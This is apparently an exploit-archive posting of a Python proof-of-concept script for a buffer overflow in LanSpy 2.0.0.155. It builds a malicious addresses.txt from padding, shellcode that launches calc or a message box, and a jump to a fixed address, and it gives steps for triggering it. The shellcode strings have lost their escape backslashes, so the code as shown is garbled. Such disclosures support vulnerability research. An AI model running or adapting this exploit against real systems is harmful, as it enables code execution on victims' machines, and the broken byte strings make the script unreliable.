LanSpy 2.0.0.155 Buffer Overflow
Posted on 19 October 2016
#!/usr/bin/python ### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ### # Date: 2016-10-18 # Exploit Author: n30m1nd # Vendor Homepage: www.lantricks.com # Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe # Version: LanSpy 2.0.0.155 # Tested on: Tested on Win7 32bit and Win10 64 bit # Platforms # ========= # Tested on Win7 32bit and Win10 64 bit # This exploit should work everywhere since the binary does not implement DEP nor ASLR # Credits # ======= # Shouts to hyp3rlinx for the PoC: # https://www.exploit-db.com/exploits/38399/ # http://hyp3rlinx.altervista.org/ # And shouts to the crew at Offensive Security for their huge efforts on making # the infosec community better # How to # ====== # * Run this python script. It will generate an "addresses.txt" file. # * Replace this file in the root directory of your LanSpy.exe installation. # * Run LanSpy.exe and start the scan or do so by pressing F3. # - You can also call LanSpy.exe from the command line like the following and # it will run the exploit straight away: echo n30 | C:PathToLanSpy.exe # Exploit code # ============ import struct # 32bit Alphanum-ish shellcodes # Bad chars detected: 00 2d 20 # MessageBoxA at => 00404D80 msgbox_shellcode = ( "x31xC0x50x68" "x70x77x6Ex64" "x54x5Fx50x57" "x57x50x35xC4" "x80x80x55x35" "x44xCDxC0x55" "x50xC3" ) # WinExec at -> 004EC4FF calc_shellcode = ( "x31xC0x50x68" "x63x61x6Cx63" "x54x5Fx50x57" "x35xC3x4ExC3" "x55x35x3Cx8A" "x8Dx55x50xC3" ) # Change the shellcode to be used here scde = calc_shellcode #scde = msgbox_shellcode # 126 are the bytes to jmp back with opcode x74x80 => ja -80h and it is where our shellcode resides junk = 'A'*(676-126) if len(scde) > 126: exit("[e] Shellcode is too big! Egghunter maybe? ;)") # 0040407D => jmp ecx inside LanSpy jecx = 'A'*(126-len(scde))+'x74x80CC'+struct.pack('<I', 0x0040407D) # Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode payl = junk + scde + jecx with open("addresses.txt", "wb") as f: f.write(payl) f.close()
